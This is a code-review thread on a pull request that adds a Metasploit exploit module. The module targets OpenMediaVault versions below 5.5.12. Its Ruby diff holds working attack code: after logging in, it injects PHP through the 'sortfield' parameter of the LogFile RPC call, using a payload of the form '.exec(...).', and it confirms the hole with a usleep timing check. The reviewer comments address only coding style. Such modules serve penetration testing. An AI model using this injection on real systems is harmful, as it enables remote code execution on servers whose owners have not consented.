modules/exploits/unix/webapp/openmediavault_rpc_rce.rb

```diff
@@ -0,0 +1,227 @@
+        "options": {
+          "updatelastaccess": false
+        }
+      }.to_json
+    })
+    version = res.body.scan(/"version\":\"(\d.\d.{0,1}\d{0,1}.{0,1}\d{0,1})/).flatten.first
+    if version.nil?
+      print_error("#{peer} - Unable to grab version of OpenMediaVault installed on target!")
+      return nil
+    end
+    print_good("#{peer} - Identified OpenMediaVault version #{version}.")
+    if Gem::Version.new(version) >= (Gem::Version.new('5.5.12'))
+      return nil
+    end
+
+    return version
+  end
+
+  def execute_command(cmd, _opts = {})
+    send_request_cgi({
+      'uri' => @uri,
+      'method' => 'POST',
+      'cookie' => @cookie.to_s,
+      'data' => {
+        "service": 'LogFile',
+        "method": 'getList',
+        "params": {
+          "id": 'apt_history',
+          "start": 0,
+          "limit": 50,
+          "sortfield": "'.exec(\"#{cmd}\").'",
+          "sortdir": 'DESC'
+        },
+        "options": nil
+      }.to_json
+    })
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, 'Connection failed.')
+  end
+
+  def check
+    res = login(user, pass)
+    unless res
+      return CheckCode::Unknown("No response was received from #{peer} whilst in check(), check it is online and the target port is open!")
+    end
+
+    if @cookie.nil?
+      vprint_error("#{peer} - Failed to authenticate with OpenMediaVault.")
+      return Exploit::CheckCode::Unknown
+    else
+      vprint_good("#{peer} - Successfully authenticated with OpenMediaVault.")
+    end
+    version = get_target
+    if version.nil?
+      # We don't print out an error message here as returning this will
+      # automatically cause Metasploit to print out an appropriate error message.
+      return CheckCode::Safe
+    end
+
+    delay = rand(7...15)
+    cmd = "\").usleep(#{delay}0000).(\""
+    vprint_status("#{peer} - Verifying remote code execution by attempting to execute 'usleep()'.")
+    t1 = Time.now.to_i
+    res = execute_command(cmd)
+    t2 = Time.now.to_i
+    unless res
+      vprint_error("#{peer} - Connection failed whilst trying to perform the code injection.")
+      return CheckCode::Detected
+    end
+    diff = t2 - t1
+    if diff >= 3
+      vprint_good("#{peer} - Response received after #{diff} seconds.")
+      return CheckCode::Vulnerable
+    end
+    vprint_error("#{peer} - Response wasn't received within the expected period of time.")
+    return CheckCode::Safe
+  rescue ::Rex::ConnectionError
+    vprint_error("#{peer} - Rex::ConnectionError caught in check(), could not connect to the target.")
+    return CheckCode::Unknown
+  end
+
+  def exploit
+    res = login(user, pass)
+    unless res
+      fail_with(Failure::NoAccess, 'Authentication failed')
+    end
+
+    if @cookie.nil?
+      print_error("#{peer} - Failed to authenticate with OpenMediaVault.")
+      return false
+    else
+      print_good("#{peer} - Successfully authenticated with OpenMediaVault.")
+    end
```

Comment:
`fail_with` is preferred. Also, redundant `else` after return.

```suggestion
    if @cookie.nil?
      fail_with(Failure::NoAccess, 'Authentication failed')
    end

    print_good("#{peer} - Successfully authenticated with OpenMediaVault.")
```

Also, is there any value in checking the return value from `login` above ? Presumably checking for `@cookie` would be sufficient?

Reply:
In my opinion, checking for @`cookie` would be sufficient, but if you have something else to propose (i.e. an extra check), please let me know.

Reply:
> 
> 
> In my opinion, checking for `@cookie` would be sufficient, but if you have something else to propose (i.e. an extra check), please let me know.

I'm suggesting less checks.

Rather than check `login` then check `@cookie` - given that they are effectively the same and that the error message for both is `authentication failed` - why not simply check only `@cookie` ?

Reply:
So something like the following would be ok: 

```  
def check
    login(user, pass)

    if @cookie.nil?
      vprint_error("#{peer} - Failed to authenticate with OpenMediaVault.")
      return Exploit::CheckCode::Unknown
    end
```

```  
def exploit
    login(user, pass)

    if @cookie.nil?
      fail_with(Failure::NoAccess, 'Authentication failed')
    end
```